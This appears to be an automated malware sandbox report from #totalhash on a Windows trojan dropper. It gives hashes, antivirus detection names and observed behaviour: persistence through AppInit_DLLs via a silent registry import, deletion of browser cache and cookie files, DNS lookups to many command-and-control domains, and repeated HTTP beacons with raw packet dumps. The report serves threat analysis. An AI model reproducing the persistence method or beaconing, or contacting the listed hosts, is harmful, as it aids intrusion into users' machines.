Analysis | #totalhash

Analysis Date	2014-12-21 17:01:30
MD5	04d6c87bc5128ece18e7ea49fbc16d82
SHA1	a01ed115bfac92fabf4679f3f8d86e6290a0b5ea

Static Details:

File type	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section	.text md5: 5da4bab728b5bea6949d94d89b5c9de9 sha1: 600ac9bb0d1c6bee165d5318800b7599c0ff3742 size: 27136
Section	.rdata md5: d064eb1d9859b2486ebba8fa8e695cb0 sha1: a24d91e096de13882d5a8747a7c94b5de841967e size: 7680
Section	.data md5: cba969fd083d72eda735679569df81b7 sha1: b5356fd63bc3ab5456b6c2ba7cda3ca352c2c520 size: 5120
Section	.rsrc md5: 266c52478d16e258367b73f5ebf6cf5c sha1: d453c6feafe6feaf2360979e25c440ae1b3696b4 size: 406016
Timestamp	2012-11-29 17:44:00
Packer	Microsoft Visual C++ ?.?
PEhash	22782c1111141b117c911e6b105a9cf17b91f0aa
IMPhash	bcbfefffacb508a2cf625400da40f22d
AV	360 Safe	Gen:Variant.Symmi.7206
AV	Ad-Aware	Gen:Variant.Symmi.7206
AV	Alwil (avast)	Crypt-OXO [Trj]
AV	Arcabit (arcavir)	Gen:Variant.Symmi.7206
AV	Authentium	W32/Cidox.A.gen!Eldorado
AV	Avira (antivir)	TR/Drop.Vundo.voua
AV	BullGuard	Gen:Variant.Symmi.7206
AV	CA (E-Trust Ino)	no_virus
AV	CAT (quickheal)	Trojan.Vundo.Gen
AV	ClamAV	WIN.Trojan.Cidox-1000
AV	Dr. Web	Trojan.Inject1.14679
AV	Emsisoft	Gen:Variant.Symmi.7206
AV	Eset (nod32)	Win32/Kryptik.APTP
AV	Fortinet	W32/Kryptik.APTP!tr
AV	Frisk (f-prot)	W32/Cidox.A.gen!Eldorado
AV	F-Secure	Gen:Variant.Symmi.7206
AV	Grisoft (avg)	Generic_r.BNL
AV	Ikarus	Trojan-Dropper.Win32.Vundo
AV	K7	Backdoor ( 04c531cb1 )
AV	Kaspersky	Trojan.Win32.Generic
AV	MalwareBytes	no_virus
AV	Mcafee	no_virus
AV	Microsoft Security Essentials	TrojanDropper:Win32/Vundo.V
AV	MicroWorld (escan)	Gen:Variant.Symmi.7206
AV	Rising	no_virus
AV	Sophos	no_virus
AV	Symantec	no_virus
AV	Trend Micro	TROJ_VUNDO.SMKK
AV	VirusBlokAda (vba32)	Backdoor.Cidox

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File	C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates File	C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes File	C:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

Registry	HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL
Creates File	C:\WINDOWS\system32\jqkjigg.dll
Creates File	\Device\Afd\Endpoint
Creates File	C:\Documents and Settings\Administrator\Cookies\cf
Deletes File	C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes File	C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process	C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNS	detoxist.com
Winsock DNS	clickbeta.ru
Winsock DNS	91.220.35.154
Winsock DNS	veroconma.com
Winsock DNS	terrans.su
Winsock DNS	getinball.com
Winsock DNS	theloamva.com
Winsock DNS	tryatdns.com
Winsock DNS	clickclans.ru
Winsock DNS	dentagod.com
Winsock DNS	denareclick.com
Winsock DNS	debijonda.com
Winsock DNS	fescheck.com
Winsock DNS	liteworns.com
Winsock DNS	getintsu.com
Winsock DNS	nshouse1.com
Winsock DNS	vengibit.com
Winsock DNS	tryangets.com
Winsock DNS	netrovad.com
Winsock DNS	vornedix.com
Winsock DNS	inzavora.com
Winsock DNS	getavodes.com
Winsock DNS	googbeds.com
Winsock DNS	clickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\jqkjigg.dll\\x00

Network Details:

DNS	detoxist.com Type: A 141.8.225.80
DNS	debijonda.com Type: A 141.8.225.80
DNS	veroconma.com Type: A 74.117.179.241
DNS	theloamva.com Type: A 141.8.225.80
DNS	vornedix.com Type: A 141.8.225.80
DNS	dentagod.com Type: A 141.8.225.80
DNS	liteworns.com Type: A 141.8.225.80
DNS	vengibit.com Type: A 141.8.225.80
DNS	tryangets.com Type: A 141.8.225.80
DNS	getintsu.com Type: A 209.222.14.3
DNS	getavodes.com Type: A 209.222.14.3
DNS	inzavora.com Type: A 209.222.14.3
DNS	googbeds.com Type: A
DNS	getinball.com Type: A
DNS	tryatdns.com Type: A
DNS	fescheck.com Type: A
DNS	netrovad.com Type: A
DNS	terrans.su Type: A
DNS	clickstano.com Type: A
DNS	denareclick.com Type: A
DNS	clickbeta.ru Type: A
DNS	nshouse1.com Type: A
DNS	clickclans.ru Type: A
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE3AwJ5rIVt4b User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE3qqUGBSDArN User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE3Ty/Kkl6I5R User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE3Ty/Kkl6I5R User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE35k189R3Z+J User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE35k189R3Z+J User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE91YPO4yATM3 User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE6NqE7LPJWfi User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE6NqE7LPJWfi User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE6NqE7LPJWfi User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwExV/pFEBgjnW User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE6NqE7LPJWfi User-Agent:
HTTP GET	http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=313&av=0&vm=0&al=0&p=744&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/ktwJzsJOjUVkVi2kwdWOx5Sk+jQOcwE0kYoGs6AkVa User-Agent:
Flows TCP	192.168.1.1:1031 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1033 ➝ 74.117.179.241:80
Flows TCP	192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1038 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1039 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1040 ➝ 209.222.14.3:80
Flows TCP	192.168.1.1:1041 ➝ 209.222.14.3:80
Flows TCP	192.168.1.1:1042 ➝ 209.222.14.3:80
Flows TCP	192.168.1.1:1043 ➝ 91.220.35.154:80

Raw Pcap

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 31332661   XX0000&key=313&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37343426 6f733d35 2e312e32 3630302e   744&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f6b 74774a7a 734a4f6a 55566b56   yg/ktwJzsJOjUVkV
0x000000b0 (00176)   69326b77 64574f78 35536b2b 6a514f63   i2kwdWOx5Sk+jQOc
0x000000c0 (00192)   77453341 774a3572 49567434 62204854   wE3AwJ5rIVt4b HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 31332661   XX0000&key=313&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37343426 6f733d35 2e312e32 3630302e   744&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f6b 74774a7a 734a4f6a 55566b56   yg/ktwJzsJOjUVkV
0x000000b0 (00176)   69326b77 64574f78 35536b2b 6a514f63   i2kwdWOx5Sk+jQOc
0x000000c0 (00192)   77453371 71554742 53444172 4e204854   wE3qqUGBSDArN HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 31332661   XX0000&key=313&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37343426 6f733d35 2e312e32 3630302e   744&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f6b 74774a7a 734a4f6a 55566b56   yg/ktwJzsJOjUVkV
0x000000b0 (00176)   69326b77 64574f78 35536b2b 6a514f63   i2kwdWOx5Sk+jQOc
0x000000c0 (00192)   77453354 792f4b6b 6c364935 52204854   wE3Ty/Kkl6I5R HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 31332661   XX0000&key=313&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37343426 6f733d35 2e312e32 3630302e   744&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f6b 74774a7a 734a4f6a 55566b56   yg/ktwJzsJOjUVkV
0x000000b0 (00176)   69326b77 64574f78 35536b2b 6a514f63   i2kwdWOx5Sk+jQOc
0x000000c0 (00192)   77453354 792f4b6b 6c364935 52204854   wE3Ty/Kkl6I5R HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 31332661   XX0000&key=313&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37343426 6f733d35 2e312e32 3630302e   744&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f6b 74774a7a 734a4f6a 55566b56   yg/ktwJzsJOjUVkV
0x000000b0 (00176)   69326b77 64574f78 35536b2b 6a514f63   i2kwdWOx5Sk+jQOc
0x000000c0 (00192)   77453335 6b313839 52335a2b 4a204854   wE35k189R3Z+J HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 31332661   XX0000&key=313&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37343426 6f733d35 2e312e32 3630302e   744&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f6b 74774a7a 734a4f6a 55566b56   yg/ktwJzsJOjUVkV
0x000000b0 (00176)   69326b77 64574f78 35536b2b 6a514f63   i2kwdWOx5Sk+jQOc
0x000000c0 (00192)   77453335 6b313839 52335a2b 4a204854   wE35k189R3Z+J HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 31332661   XX0000&key=313&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37343426 6f733d35 2e312e32 3630302e   744&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f6b 74774a7a 734a4f6a 55566b56   yg/ktwJzsJOjUVkV
0x000000b0 (00176)   69326b77 64574f78 35536b2b 6a514f63   i2kwdWOx5Sk+jQOc
0x000000c0 (00192)   77453931 59504f34 7941544d 33204854   wE91YPO4yATM3 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 31332661   XX0000&key=313&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37343426 6f733d35 2e312e32 3630302e   744&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f6b 74774a7a 734a4f6a 55566b56   yg/ktwJzsJOjUVkV
0x000000b0 (00176)   69326b77 64574f78 35536b2b 6a514f63   i2kwdWOx5Sk+jQOc
0x000000c0 (00192)   7745364e 7145374c 504a5766 69204854   wE6NqE7LPJWfi HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 31332661   XX0000&key=313&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37343426 6f733d35 2e312e32 3630302e   744&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f6b 74774a7a 734a4f6a 55566b56   yg/ktwJzsJOjUVkV
0x000000b0 (00176)   69326b77 64574f78 35536b2b 6a514f63   i2kwdWOx5Sk+jQOc
0x000000c0 (00192)   7745364e 7145374c 504a5766 69204854   wE6NqE7LPJWfi HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 31332661   XX0000&key=313&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37343426 6f733d35 2e312e32 3630302e   744&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f6b 74774a7a 734a4f6a 55566b56   yg/ktwJzsJOjUVkV
0x000000b0 (00176)   69326b77 64574f78 35536b2b 6a514f63   i2kwdWOx5Sk+jQOc
0x000000c0 (00192)   7745364e 7145374c 504a5766 69204854   wE6NqE7LPJWfi HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 31332661   XX0000&key=313&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37343426 6f733d35 2e312e32 3630302e   744&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f6b 74774a7a 734a4f6a 55566b56   yg/ktwJzsJOjUVkV
0x000000b0 (00176)   69326b77 64574f78 35536b2b 6a514f63   i2kwdWOx5Sk+jQOc
0x000000c0 (00192)   77457856 2f704645 42676a6e 57204854   wExV/pFEBgjnW HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 31332661   XX0000&key=313&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37343426 6f733d35 2e312e32 3630302e   744&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f6b 74774a7a 734a4f6a 55566b56   yg/ktwJzsJOjUVkV
0x000000b0 (00176)   69326b77 64574f78 35536b2b 6a514f63   i2kwdWOx5Sk+jQOc
0x000000c0 (00192)   7745364e 7145374c 504a5766 69204854   wE6NqE7LPJWfi HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 31332661   XX0000&key=313&a
0x00000040 (00064)   763d3026 766d3d30 26616c3d 3026703d   v=0&vm=0&al=0&p=
0x00000050 (00080)   37343426 6f733d35 2e312e32 3630302e   744&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
